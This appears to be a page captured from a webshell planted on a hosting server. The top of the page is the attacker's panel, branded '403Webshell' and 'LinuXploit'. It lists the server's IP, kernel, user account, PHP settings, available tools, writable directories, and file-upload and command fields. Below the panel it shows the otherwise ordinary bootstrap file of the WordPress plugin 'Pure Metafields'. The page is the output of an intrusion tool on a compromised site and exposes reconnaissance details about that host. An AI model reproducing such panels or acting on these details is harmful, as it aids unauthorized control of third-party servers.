403Webshell
Server IP : 69.72.244.102  /  Your IP : 216.73.216.164
Web Server : LiteSpeed
System : Linux s3434.fra1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
User : konzalta ( 1271)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/konzalta/atlasoceanlink.com/wp-content/plugins/pure-metafields/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/konzalta/atlasoceanlink.com/wp-content/plugins/pure-metafields/pure-metafields.php
<?php

/**
 * The plugin bootstrap file
 *
 * This file is read by WordPress to generate the plugin information in the plugin
 * admin area. This file also includes all of the dependencies used by the plugin,
 * registers the activation and deactivation functions, and defines a function
 * that starts the plugin.
 *
 * @link              https://themepure.net
 * @since             1.4.4
 * @package           tpmeta
 *
 * @wordpress-plugin
 * Plugin Name:       Pure Metafields
 * Plugin URI:        https://themepure.net/plugins/puremetafields/files/pure-metafields.zip
 * Description:       Plugin For Custom Metabox To Attach To Any Post Types.
 * Version:           1.4.4
 * Author:            ThemePure
 * Author URI:        https://themepure.net
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       pure-metafields
 * Domain Path:       /languages
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

define( 'TPMETA_VERSION', '1.4.4' );
define( 'TPMETA_PATH', plugin_dir_path(__FILE__) );
define( 'TPMETA_URL', plugin_dir_url(__FILE__) );

/**
 * The code that runs during plugin activation.
 * This action is documented in includes/class-pure-metafields-activator.php
 */
if(!function_exists('tpmeta_activate_tp_metabox')){
	function tpmeta_activate_tp_metabox() {
		require_once TPMETA_PATH . 'includes/class-pure-metafields-activator.php';
		tpmeta_activator::activate();
	}
	register_activation_hook( __FILE__, 'tpmeta_activate_tp_metabox' );
}

/**
 * The code that runs during plugin deactivation.
 * This action is documented in includes/class-pure-metafields-deactivator.php
 */
if(!function_exists('tpmeta_deactivate_tp_metabox')){
	function tpmeta_deactivate_tp_metabox() {
		require_once TPMETA_PATH . 'includes/class-pure-metafields-deactivator.php';
		tpmeta_aeactivator::deactivate();
	}
	register_deactivation_hook( __FILE__, 'tpmeta_deactivate_tp_metabox' );
}

/**
 * The core plugin class that is used to define internationalization,
 * admin-specific hooks, and public-facing site hooks.
 */
require TPMETA_PATH . 'includes/class-pure-metafields.php';



/**
 * Begins execution of the plugin.
 *
 * Since everything within the plugin is registered via hooks,
 * then kicking off the plugin from this point in the file does
 * not affect the page life cycle.
 *
 * @since    1.4.0
 */
if(!function_exists('tpmeta_kick')){
	function tpmeta_kick() {
		$plugin = new tpmeta();
		$plugin->run();
	}
	tpmeta_kick();
}

require_once TPMETA_PATH . 'metaboxes/functions.php';
require_once TPMETA_PATH . 'metaboxes/class-metabox.php';



Youez - 2016 - github.com/yon3zu
LinuXploit